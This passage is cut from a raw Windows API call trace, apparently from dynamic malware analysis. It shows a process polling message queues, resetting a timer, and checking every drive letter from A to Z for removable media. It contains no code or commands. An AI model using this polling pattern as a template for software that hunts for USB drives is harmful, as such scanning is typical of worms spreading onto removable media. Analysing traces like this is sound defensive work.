(in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.204] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0219.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.204] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.204] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0219.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0219.204] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0219.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0219.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0219.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0219.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.217] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.217] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.218] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.218] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.218] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.251] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.252] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.252] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.252] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.252] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.253] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.253] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.253] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.253] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.254] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.254] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.254] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.254] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.255] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.255] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.255] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.255] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.255] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.256] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.256] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.256] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.256] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.257] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.257] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.257] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.257] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.258] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.258] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325ea0 [0219.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0219.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0219.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325ea0 | out: hHeap=0x12c0000) returned 1 [0219.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0219.258] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0219.258] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0219.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.259] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0219.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.259] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.259] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0219.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0219.259] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0219.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0219.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0219.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.260] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.260] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.260] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.260] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.260] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.261] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.261] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.261] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.261] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.261] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.262] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.262] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.262] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.262] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.262] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.263] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.263] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.263] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.264] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.264] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.264] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.264] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.265] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.265] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.265] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.265] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.266] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0219.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.266] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.266] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.266] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.267] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.267] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.267] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.267] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.267] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0219.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0219.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0219.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0219.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0219.267] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.267] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0219.267] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0219.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.268] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.268] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0219.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.268] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0219.268] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0219.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0219.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.269] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.269] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.269] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.269] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.269] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.270] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.270] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.270] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.270] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.270] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.271] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.271] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.271] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.271] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.272] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.272] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.272] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.272] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.273] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.273] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.273] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.273] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.273] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.276] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.276] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.276] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.276] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.276] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.276] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.276] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.276] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.276] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.277] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0219.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0219.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.277] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.277] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0219.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0219.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.277] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.277] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.277] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.277] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0219.277] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0219.277] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.277] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0219.278] PeekMessageW (in: 